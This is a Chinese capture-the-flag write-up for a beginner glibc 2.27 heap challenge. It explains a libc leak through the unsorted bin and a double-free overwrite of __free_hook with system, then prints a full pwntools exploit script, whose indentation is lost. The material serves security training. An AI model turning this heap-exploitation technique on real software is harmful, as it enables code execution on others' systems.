目前只有我一人解出来,估计是其他大佬不屑于做这样简单的题吧!
长话短说,做堆类题一定要亲自动手调试!!!调试!!!调试!!!,重要的事情说三遍。
难度
入门级别,很简单
解析
题目给了libc版本,是libc_2.27。
首先先创建7个0x80的chunk,然后把他们free掉,使他们进入tcache bins,然后再创建一个0x80大小的chunk释放掉,使其进入unsorted bins,因为本题free掉chunk后并没有置0,所以纯在UAF和double free。然后可以通过show函数泄露unsorted bins中的地址计算libc基地址,在通过double free漏洞改__free_hooke的值为system的值,最后拿到shell。
标题最终exp
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./chunk1"
io = remote("challenge-c1de9e72dce05941.sandbox.ctfhub.com",28689)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27_64.so")
def add(idx,size,data):
io.recvuntil(b"Your choice: ")
io.sendline(b"1")
io.recvuntil(b"Give me a book ID: ")
io.sendline(str(idx))
io.recvuntil(b"how long: ")
io.sendline(str(size))
io.recvuntil(b"Content: ")
io.send(data)
def show(idx):
io.recvuntil(b"Your choice: ")
io.sendline(b"2")
io.recvuntil(b"Which book do you want to show?")
io.sendline(str(idx))
def free(idx):
io.recvuntil(b"Your choice: ")
io.sendline(b"3")
io.recvuntil(b"Which one to throw?")
io.sendline(str(idx))
for i in range(7):
add(i,0x80,b"aaaa")
add(7,0x80,b"aaaa")
add(8,0x90,b"/bin/sh\x00")
for i in range(8):
free(i)
show(7)
io.recvuntil(b"Content: ")
libc_addr = u64(io.recv(6).ljust(8,b"\x00"))-96-0x10-libc.sym['__malloc_hook']
free_hook = libc_addr+libc.sym['__free_hook']
system_addr = libc_addr+libc.sym['system']
print(b"libc_addr-------------->: ",hex(libc_addr))
print(b"free_hook-------------->:",hex(free_hook))
for i in range(6):
add(6-i,0x80,b"aaaa")
free(0)
add(0,0x80,p64(free_hook))
add(9,0x80,b"aaaa")
add(10,0x80,p64(system_addr))
free(8)
io.interactive()